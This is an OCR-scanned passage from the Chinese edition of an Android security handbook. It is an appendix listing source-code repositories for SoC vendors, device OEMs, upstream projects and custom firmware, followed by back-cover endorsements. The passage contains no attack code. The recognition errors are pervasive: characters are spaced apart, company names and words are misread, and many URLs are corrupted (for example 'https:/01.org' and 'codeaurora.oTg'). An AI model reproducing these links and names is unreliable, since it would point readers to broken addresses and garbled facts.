的 代码 名 称 是 sunxi。 方 便 起 见 ,全 志 将 其 BSP 的 源 代码 ( 包括 内 核 和 许多 其 他 组 件 众 开 在 GitHub 
上 : https://github.conylinux-sunxi。 

应 当 指出 的 是 ， 谷 歌 并 没有 维护 这 些 源 代码 的 官方 镜像 ， 因 为 直到 现在 也 没有 官方 支持 的 
AOSP 设备 使 用 全 志 SoC。 






































B.2.2 英特尔 


与 本 节 中 其 他 SoC 厂商 不 同 ,英特尔 ( Intel ) 并 不 生产 ARM 芯片 ， 而 是 尝试 利用 基于 其 
Atom 产品 线 的 低 功 耗 x86 SoC 来 打 和 人 移动 市 场 。 更 具体 地 说 , 它 主要 是 将 Bay Trail 和 Silvermont 
这 两 个 SoC 用 于 移动 领域 , 但 是 事实 上 只 有 极 少 的 Android 设备 是 基于 它们 的 。 也 就 是 说 ， 英 特 
尔 是 在 X86 硬件 上 运行 Android 的 最 大 支持 者 。 它 在 “android-ia” 这 个 别名 下 提供 了 不 少 资源 。 英 

寺 尔 的 资源 主要 位 于 自己 的 开发 者 网 站 、Gerrit 代码 审计 系统 和 下 载 站 点 : 
口 https:/01.org/android-ia/documentation/developers 
口 https://android-review.01.org/#/admin/projects/ 
口 https:/01.org/android-ia/downloads 










































































注意 ”英特尔 的 Gerrit 站 点 提供 了 对 其 所 管理 仓库 的 GitWeb 访问 方式 。 
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B.2.3 “美满 


人 们 一 般 认为 美满 ( Marvell ) 是 一 家 传统 的 多 型 号 小 尺寸 插 拔 式 ARM 云 计 算 机 厂商 。 只 有 
很 少 的 移动 设备 基于 美满 的 ARM SoC。 曾 经 有 谣传 称 著 名 “每 个 儿童 一 台 笔 记 本 所 One Laptop Per 
Child，OLPC ) 项 目的 XO 平板 是 基于 Android 和 Marvell SoC 构建 的 。 除 了 移动 领域 , 许多 第 二 
代 的 Google TV 设备 (它们 可 以 算是 Android 设备 的 表亲 ) 是 基于 Marvell SoC 构建 的 。 昌 然 美 
满 看 起 来 提供 了 一 个 开源 站 点 ， 但 直到 本 书写 作 时 这 个 站 点 依然 是 空 的 。 

不 过 有 许多 Marvell SoC 特定 的 代码 已 经 进入 Linux 内 核 上 游 了 。 可 以 从 这 里 找到 更 多 信息 : 


http://opensource.marvell.com/。 


B.2.4 ”联发科 


联发科 ( MediaTek ) 是 男 一 家 中 国 SoC 厂商 。 除 了 SoC, 它 还 生产 其 他 OEM 会 用 到 的 其 他 
外 围 芯片 ,联发科 生产 的 许多 模块 的 驱动 源 代码 可 以 从 它 的 网 站 下 载 到 :http:/www.mediatek.com/ 
_en/07 downloads/01 windows.php?sn=501。 

与 全 志 类 似 ， 到 目前 为 止 还 没有 AOSP 官方 支持 设备 采用 了 联发科 SoC。 


















































B.2.5” 英 传达 


英 伟 达 ( Nvidia ) 生产 的 ARM SoC 主要 是 Tegra 产品 线 ， 被 许多 Android 设备 所 使 用 ,包括 
Nexus 7 2012 版 。 作 为 整个 生态 系统 中 杰出 的 一 员 ，Nvidia 为 Tegra SoC 和 Shield 视频 游戏 系统 
运营 着 一 个 开发 者 计划 。 它 还 为 其 开源 Git 仓库 提供 了 非常 方便 的 GitWeb 接口 。 这 些 源 代码 除 
了 可 以 从 GitWeb 站 点 下 载 ， 还 能 从 AOSP 官方 镜像 下 载 : 

口 http://nv-tegra.nvidia.com/gitweb/ 
口 https://android.googlesource.com/kernel/tegra 
口 https://developer.nvidia.com/develop4shield#OSR 











B.2.6 ”德州 仪器 


虽然 德州 仪器 〈Texas Instruments，TI) 曾经 表明 过 退出 移动 领域 的 意图 ,但 是 在 过 去 几 年 
中 , 其 OMAP SoC 还 是 被 用 于 相当 多 的 Android 设 备 上 , 包括 Samsung Galaxy Nexus、 Pandaboard 
和 Google Glass。 正 如 我 们 预料 的 那样 ,谷歌 在 AOSP 中 管理 了 一 份 OMAP 内 核 的 镜像 。 从 这 些 
链接 中 可 以 找到 OMAP 内 核 源 代码 的 不 同 版 本 : 
口 http://dev.omapzoom.org/ 














口 http://git.kernel.org/cgit/linux/kernel/git/tmlind/linux-omap.git/ 





口 https://android.googlesource.com/kernel/omap 
由 于 OMAP 平台 在 整个 生态 系统 中 有 着 悠久 的 历史 ， 现 在 有 许多 相关 资源 ， 比 如 一 些 由 社 
区 运 维 的 Wiki 系 统 。 下 面 这 些 链 接 就 指向 其 中 一 些 资源 : 
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口 http://elinux.org/Android on OMAP 

OD http:/www.omappedia.com/wiki/Main Page 

口 http://www.ti.com/lsds/ti/tools-software/android.page 
D https://gforge.ti.com/gf/project/omapandroid 


B.2.7 高通 


高 通 (Qualcomm ) 也 许 是 Android 生态 系统 中 最 多 产 的 SoC 厂商 ， 它 生产 MSM 和 APQ 两 
个 系列 的 SoC。APQ 与 MSM 不 同 的 地 方 在 于 ， 它 只 包含 应 用 处 理 右 ， 不 包含 基带 。 

在 Android 开源 社区 方面 ， 高 通 为 CodeAurora 论坛 提供 了 大 量 的 资源 。CodeAurora 是 一 个 
由 多 个 公司 组 成 的 社团 ， 致 力 于 用 开放 来 为 终端 用 户 带 来 优化 和 创新 。 在 CodeAurora 论坛 站 点 
上 有 大 量 的 开源 仓库 ， 其 中 一 些 并 不 针对 于 Android。 此 外 ， 谷 歌 还 维护 了 其 Nexus 设备 所 使 用 
MSM 内 核 代 码 树 的 镜像 。 可 以 通过 下 面 这 些 URL 获得 高 通 的 源 代码 : 


口 https:/www.codeaurora.org/projects/all 




















口 https://www.codeaurora.oTg/cgit/ 





D https://android.googlesource.com/kernel/msm 
B.2.8 三 星 


三 星 ( Samsung ) 生 产 自己 的 SoC, 名 为 Exynos。 Os SoC 用 于 生产 自己 的 多 种 Android 
移动 设备 , 包括 特定 版 本 的 Galaxy S3 和 Galaxy S4。 三 星 通 过 一 个 可 以 搜索 的 开源 站 点 提供 其 内 
核 源 代码 以 及 对 Android 代码 树 所 作 的 一 些 修改 。 由 于 Nexus S Nexus 10 都 是 基于 Exynos SoC 
的 ， 谷 歌 也 维护 了 该 内 核 的 一 个 镜像 。 可 以 通过 下 列 URL 访问 三 星 的 开源 代码 : 


口 http://opensource.samsung.com/ 









































口 https://android.googlesource.com/kernel/samsung 





QD https://android.googlesource.com/kernel/exynos 

此 外 ， 还 有 许多 基于 Exynos 的 开发 板 ， 比 如 Hardkernel 的 ODROID 产品 、InSignal 的 
OrigenBoard 开发 板 ， 以 及 ArndaleBoard 开发 板 ， 等 等 。 这 些 设备 的 源 代码 都 可 以 从 其 相应 的 厂 
商 处 获得 
口 http:/com.odroid.com/sigong/nf file board/nfile board.php 
口 http://www.arndaleboard.org/wiki/index.php/Resources#How to Download Source Tree 





口 http:/www.origenboard.org/wikyindex.php/Resources#How to Download Source Tree 





口 http://www.origenboard.org/wiki/index.php/Resources#How to Download Source Tree 2 


B.3 OEM 


之 前 介绍 过 , OEM 最 终 负 责 创建 具有 完整 功能 的 终端 设备 。OEM 无 疑 需要 对 各 类 组 件 进行 
最 多 的 改动 ,包括 开源 的 组 件 、 私 有 许可 授权 的 组 件 以 及 内 部 开发 的 组 件 。 一般 情况 下 ,只 有 对 
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开源 组 件 的 修改 会 以 源 代码 的 形式 公布 出 来 。 与 SoC 厂商 一 样 ， 从 法 律 的 角度 来 说 ，OEM 也 需 
要 遵循 GPL 协议 将 相应 的 源 代码 予以 公开 。 

虽然 所 有 的 OEM 都 被 相同 的 规则 所 限制 , 但 它们 在 实践 中 遵循 规则 的 方式 各 有 不 同 。 比 如 ， 
一 些 OEM 使 用 类 似 于 GitHub 的 站 点 来 开放 整个 开发 过 程 , 而 男 一 些 广 商 则 可 能 完全 秘密 地 进行 
开发 ， 只 将 最 终 的 代码 打包 提供 下 载 。 对 于 不 同 的 OEM 以 及 不 同 的 系统 版 本 ， 发 布 代码 的 时 间 
也 大 相 径 庭 。 本 节 简 要 介绍 一 些 顶 级 设备 OEM 的 实际 情况 并 提供 相关 源 代码 的 下 载 地 址 。 


























B.3.1 华硕 


华硕 (ASUS ) 是 许多 Android 设备 的 厂商 ， 比 如 非常 流行 的 Nexus7 平 台电 脑 。 每 次 新 的 固 
件 升 级 后 不 久 , 华硕 就 会 将 源 代 码 以 TAR 压缩 包 的 形式 放 到 其 支持 站 点 上 。 由 于 Nexus 7 平板 运 
行 的 是 官方 的 Android， 因 此 不 包括 其 源 代码 。 找 到 特定 设备 源 代码 的 方法 是 访问 华硕 的 支持 站 
点 (www.asus.com/support )， 搜 索 设备 名 称 或 者 设备 型 号 ， 选 择 Drivers & Tools， 然 后 从 下 拉 菜 
单 中 选择 Android。 



































B.3.2 HTC 


HTC 是 最 早 的 Android 设备 厂商 之 一 。 它 生产 了 第 一 个 公开 的 开发 者 设备 HTC G1。 这 人 台 
机 在 发 布 的 时 候 又 被 称 为 GPhone。 此 后 ,HTC 还 生产 了 Nexus One, 也 就 是 第 一 台 Nexus 设备 。 
除了 这 两 台 AOSP 支持 的 设备 ， 此 后 HTC 每 年 还 生产 了 大 量 的 零售 设备 。 最 近 它 发 布 了 在 消费 
者 中 很 受 欢迎 的 HTC One 手机 。 

HTC 通常 会 在 新 固件 发 布 后 的 几 天 内 就 放出 源 代 码 ， 不 过 只 有 Linux 内 核 会 被 开源 。HTC 
对 Android 平台 所 作 的 其 他 任何 修改 和 扩展 都 没有 开源 。HTC 发 布 的 源 代码 一 般 以 TAR 压缩 包 
的 形式 放 在 其 开发 者 中 心 的 网 站 上 : http:/www.htcdev.com/devcenter/downloads。 

































































B.3.3 LG 


在 生产 了 像 Optimus G 和 LG G2 这 样 的 设备 后 ，LG 迅速 成 为 顶尖 的 OEM。LG 还 制造 了 两 
个 最 新 的 Nexus 手机 : Nexus 4 和 Nexus 5。 和 其 他 OEM 一 样 ，LG 没有 发 布 其 Nexus 设备 的 源 
代码 ， 因 为 这 些 设备 有 AOSP 的 完整 支持 。 不 过 ，LG 放出 了 其 他 零售 设备 源 代 码 。 可 惜 的 是 ， 
LG 在 发 布 新 的 固件 版 本 后 ， 有 时 候 需 要 相当 长 的 时 间 才 会 放出 源 代码 。 可 以 在 LG 的 开源 人 口 页 
面 上 搜索 设备 名 称 或 型 号 ,快速 地 找到 对 应 的 源 代码 TAR 压缩 包 : http:/www.lg.com/global/support/ 


opensource/index。 

















B.3.4 ”摩托 罗拉 


摩托 罗拉 (Motorola ) 进入 Android 生态 系统 已 经 有 相当 长 一 段 时 间 了 。 考 虑 到 它 在 芯片 产 
业 和 移动 领域 的 悠久 历史 ， 这 是 很 自然 的 。 摩 托 罗 拉 创 造 了 备 受 欢迎 的 RAZR 翻盖 手机 。2013 
年 ， 谷 歌 收 购 了 摩托 罗拉 移动 ， 也 就 是 摩托 罗拉 生产 Android 设备 的 部 门 。 摩 托 罗 拉 从 未 出 三 过 
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Nexus 设备 ， 不 过 有 不 少 其 他 零售 设备 。 比 如 ， 它 为 Verizon 生产 了 DROID 系列 产品 。 
摩托 罗拉 通过 Source Forge 网 站 发 布 源 代码 ， 发 布 周 期 通常 在 新 设备 或 新 版 固件 发 布 后 一 个 
月 之 内 。 这 些 源 代码 以 TAR 压缩 包 的 形式 提供 : http://sourceforge.net/motorola/wiki/Projects/。 








B.3.5 三 星 


到 目前 为 止 ， 三 星 已 经 生产 了 许多 非常 受 追 捧 的 Android 设备 ， 是 Android 设备 市 场 的 领跑 
者 。 其 产品 包括 Galaxy 产品 线 以 及 三 台 Nexus 设备 : Nexus S、Galaxy Nexus 和 Nexus 10。 三 星 
发 布 源 代码 的 时 间 周 期 也 比较 快 。 其 源 代码 以 TAR 压缩 包 的 形式 提供 ， 包 括 内 核 和 平台 的 源 代 
人 码 ， 可 以 在 其 开源 页 面 找到 : http://opensource.samsung.com/。 


B.3.6 索尼 


索尼 的 移动 分 公司 (Sony Mobile ) 来 自 于 对 瑞典 公司 爱立信 ( Ericsson ) 的 一 系列 合作 与 收 
购 行为 。 在 过 去 几 年 间 ， 爱 立信 生产 了 许多 型 号 的 设备 ， 比 如 近期 的 Xperia 系列 。 索 尼 尚 未 生 
产 过 Nexus 设备 。 

索尼 爱立信 也 许 是 最 快 发 布 开 源 代码 的 厂商 。 有 时 候 , 它 甚 至 在 设备 发 布 之 前 就 放出 了 源 代 
码 。 此 外 ， 索 尼 爱 立信 也 是 最 为 拥抱 开源 的 ， 它 是 目前 唯一 创建 了 官方 GitHub 账号 来 存放 代码 
的 Android 设备 OEM。 除了 通过 其 GitHub 账号 , 索尼 爱立信 还 在 其 开发 者 站 点 发 布 传统 TAR 源 
代码 压缩 包 。 相 关 网 址 如 下 : 


OQ http://developer.sonymobile.com/downloads/xperia-open-source-archives/ 




















口 http://developer.sonymobile.com/downloads/opensource/ 





OQ https://github.com/sonyxperiadev/ 
B.4 上 游 代码 源 


本 书 多 次 提 到 ，Android 是 许多 开源 项 目的 混合 体 。 在 AOSP 的 external 目录 下 包含 了 几乎 
所 有 外 部 开源 项 目的 本 地 副本 。 在 本 书写 作 时 ， 共 包含 169 个 子 目 录 。 许 多 目录 代表 与 Android 
源 代码 分 开 管理 的 开源 项 目 , 不 过 并 不 是 所 有 目录 都 与 项 目 一 一 对 应 。 每 个 项 目 开 发 者 的 开发 方 
式 都 不 尽 相 同 。 在 互联 网 上 简单 搜索 一 下 ,很 快 就 能 找到 各 个 项 目的 主页 ， 从 而 进一步 找到 这 些 
项 目 源 代码 的 上 游 最 新 版 本 。 例如 ，WebKit 是 external 目录 下 最 大 的 开源 项 目 之 一 ， 其 项 目 主页 
地 址 是 http:/www.webkit.org/, 获得 其 源 代码 的 方法 在 http://www.webkit.org/building/checkout.html 
有 详细 说 明 。 

Android 系统 中 最 大 的 开源 组 件 无 疑 是 Linux 内 核 ， 有 上 万 名 开发 人 员 为 这 个 项 目 贡献 过 代 
码 。 该 项 目的 源 代 码 在 解压 缩 后 约 为 600MB 。 本 附录 前 面 已 经 说 过 , 谷歌 和 其 他 公司 托管 了 Linux 
内 核 源 代码 的 可 工作 镜像 。 这 些 镜像 通常 是 与 设备 或 其 SoC 芯片 集 相 关 的 。 另 一 方面 ，Linux 内 
核 项 目 也 在 按照 自己 的 节奏 稳步 发 展 。 上 游 Linux 内 核 项 目 中 包含 许多 围绕 它 的 资源 , 不 过 其 自 
身 的 源 代码 已 经 在 托管 了 很 长 时 间 。 请 注意 ， 直 接 使 用 来 自 上 游 Linux 内 核 源 仓库 并 不 适合 胆 小 
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的 人 ， 因 为 其 中 包含 太 多 需要 责任 自负 的 项 目 、 仓 库 和 分 支 。 下 面 这 些 URL 指向 Linux 内 核 的 
官方 源 代 码 仓库 ， 包 括 主 仓库 列 表 、 稳 定 版 代码 树 ， 以 及 Linus 的 合并 树 : 

口 https://git.kernel.org/cgit/ 

口 https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/ 











口 https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/ 


B.5 其 他 源 代码 


除了 本 附录 前 面 介绍 过 的 源 代码 资源 ，Android 爱好 者 社区 还 创建 了 大 量 其 他 的 Android 相 
关 源 代码 。 从 专门 用 于 固件 定制 的 到 纯粹 出 于 个 人 兴趣 的 ， 各 类 源 代 码 在 互联 网 上 随处 可 得 。 本 
节 介绍 在 研究 Android 安全 过 程 中 发 现 的 一 些 源 代码 。 


B.5.1 定制 化 固件 


固件 定制 团队 的 运作 在 许多 方面 都 和 OEM 的 软件 团队 类 似 。 他 们 定制 AOSP 代码 ， 管 理 并 
集成 各 类 软件 ， 使 系统 支持 设备 中 的 各 类 硬件 组 件 。 像 CyanogenMod 、AOKP 、SuperNexus 和 
OmniROM 的 许多 项 目 都 将 其 源 代码 开放 ， 其 至 大 部 分 都 将 其 开发 过 程 完 完 全 全 地 保持 开放 。 上 
述 4 个 项 目的 源 代码 可 以 在 这 里 找到 : 

口 https://github.com/CyanogenMod 

口 https://github.com/AOKP 

口 https://github.com/SuperNexus 


口 http:/omnirom.org/source-code/ 

















B.5.2 Linaro 


Linaro 项 目 是 男 一 个 杰出 的 开源 项 目 。 它 的 运作 方式 和 Linux 分 发 版 类 似 ， 即 开放 地 进行 组 件 
的 移植 和 集成 , 以 产生 出 高 质量 的 构建 代码 。Linaro 项 目的 源 代 码 位 于 : https://wiki.linaro.org/Source。 











B.5.3 Replicant 


另 一 个 有 趣 的 项 目 是 Replicant, 其 目的 是 生产 完全 开源 且 自 由 许可 的 Android 兼容 设备 固件 。 
它 不 再 借用 Android 的 名 字 ， 不 过 是 基于 AOSP 的 。 地 址 是 : http://redmine.replicant.us/projects/ 
replicant/wiki/ReplicantSources。 


























B.5.4 代码 索引 


为 了 更 加 方便 , 许多 独立 的 团体 都 在 构建 易于 浏览 和 搜索 的 AOSP 源 代码 索引 。 我 们 推荐 其 
中 的 一 个 : 
口 http://androidxref.com/ 
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B.5.5 个 人 代码 库 


除了 这 些 项 目 , 还 有 相当 一 部 分 社区 中 的 爱好 者 也 建立 了 自己 的 仓库 并 开发 了 一 些 有 趣 的 特 
性 。 比 如 ， 一 些 人 致力 于 将 新 的 Android 版 本 后 向 移植 到 本 不 支持 的 设备 上 去 。 不 过 要 找到 这 类 
代码 仓库 并 不 容易 ， 有 一 种 方法 是 在 GitHub 和 BitBucket 这 类 流行 的 开源 开发 平台 上 进行 搜索 ， 
另 一 种 方法 则 是 关注 像 Android Police 这 样 的 Android 新 闻 站 点 或 者 像 XDA Developers 这 样 的 
论坛 。 
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“本 书 的 主要 作者 是 在 信息 安全 领域 浸 淫 多 年 的 
一 流 专家 ， 三 位 译 者 也 都 在 技术 一 线 耕耘 多 年 并 各 有 
卓越 成 就 。 这 种 全 明星 阵容 让 我 对 本 书 充满 期 待 。” 


-一 于 电 (tombkeeper ) 


腾讯 “玄武 ”实验 室 总 监 ， 著 名 安全 专家 
微软 漏洞 防御 挑战 悬赏 10 万 美元 大 奖 获得 者 


“一 本 值得 安全 从 业者 认真 研读 的 经 典 Android 系 
统 安 全 方向 技术 图 书 ， 高 质量 的 翻译 也 保证 了 技术 内 
容 的 原 汁 原味 传达 。” 


一 一 何 淇 丹 ( Flanker) 


Keen Team 高 级 研究 员 


高 兴 看 到 这 样 一 本 好 书 可 以 用 中 文 的 形式 呈 
现在 大 家 面前 。 在 移动 平台 安全 成 为 热点 的 今天 ， 讲 
解 相关 底层 技术 的 书籍 却 少 得 可 怜 ， 内 容 丰 富 的 更 是 
寥寥 无 几 。 这 本 书 的 出 现 ， 无 疑 打破 了 这 一 僵局 。 全 
书 以 应 用 软件 、 系 统 内 核 、 硬 件 等 层面 为 出 发 点 ， 讲 
解 了 在 安 卓 平台 上 ， 如 何 对 其 进行 漏洞 分 析 、 挖 掘 等 
鲜 为 人 知 的 安全 技术 。 书 中 的 干货 颇 多 ， 绝 对 是 软件 
安全 与 开发 人 员 案 头 必 备 的 一 本 技术 专著 。 我 相信 ， 
此 书 将 会 引领 安 卓 平台 的 安全 技术 潮流 !“ 


-一 丰 生 强 ( 非 虫 ) 


Android 软 件 安全 专家 ， 看 雪 论 坛 Android 安 全 版 版 主 
安 卓 巴士 开发 交流 版 版 主 
《Android 软 件 安全 与 逆向 分 析 》 作 者 


“这 是 第 一 本 关于 Android 系 统 安全 方面 的 书 
籍 ， 内 容 涵盖 了 设备 系统 底层 、 漏 洞 挖掘 及 利用 方面 
的 知识 ， 本 书 的 作者 都 是 在 网 络 安全 以 及 嵌入 式 设 备 
领域 的 高 级 专家 。 此 书 由 我 国 几 位 在 计算 机 网 络 安全 
的 学 术 和 工业 界 享 有 杰出 声望 的 专家 们 译 制 而 成 ， 他 
们 专业 领域 的 知识 能 够 保证 该 书 的 翻译 质量 ， 让 读者 
能 够 从 浅 至 深 地 掌握 书 中 的 技能 ， 并 且 熟 练 玩 转 
Android 设 备 。” 


一 dm557 


PanguTeam 成 员 


“说 实话 ， 在 Android 的 安全 与 开发 方面 ， 没 有 
哪 本 书 比 这 本 更 加 详细 。” 
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如 果 您 对 本 书 内 容 有 疑问 ， 可 发 邮件 至 contact@turingbook.com， 会 有 编辑 或 作 
译 者 协助 答疑 。 也 可 访问 图 灵 社 区 ， 参 与 本 书 讨论 。 
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ebook@turingbook.com。 
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